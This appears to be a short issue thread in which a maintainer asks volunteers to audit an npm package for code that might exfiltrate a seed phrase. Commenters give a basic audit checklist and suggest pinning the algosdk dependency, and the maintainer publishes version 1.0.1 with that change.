Calling soft auditors to vet v1.0.1 on npm

Question

Calling soft auditors to vet v1.0.1 on npm

Opened this issue a year ago · 3 comments

Hi,

If you are well versed enough in Javascript to go through the code on NPM and confirm that it doesn't include anything nasty that could exfil a user's seed phrase, that would help a lot.

The package is intended to be fixed @ ~~1.0.0~~ 1.0.1* version, so if you want to audit the code on npm which is immutable and drop a comment in this issue about it doing what it says on the tin/README, that would be appreciated by myself and skeptical potential users.

* 1.0.1 published after feedback below

Answer 1 · 2023-10-04T20:42:14.000Z

Things to check:

.js files:

do not do network calls
do not save the seed phrase anywhere

package.json:

only imports the algosdk package
does not run any custom stuff like postinstall scripts

Answer 2 · 2023-10-04T20:56:12.000Z

For more immutability I would pin the algosdk version to 1.18.1 (remove the ^). That will avoid installing future malicious versions, however unlikely but possible.

Answer 3 · 2023-10-05T03:25:26.000Z

Fair enough - I didn't intend to change this but why not. 1.0.1 published with fixed algosdk.
If you think the code is benign please leave a comment to this effect.
Thanks!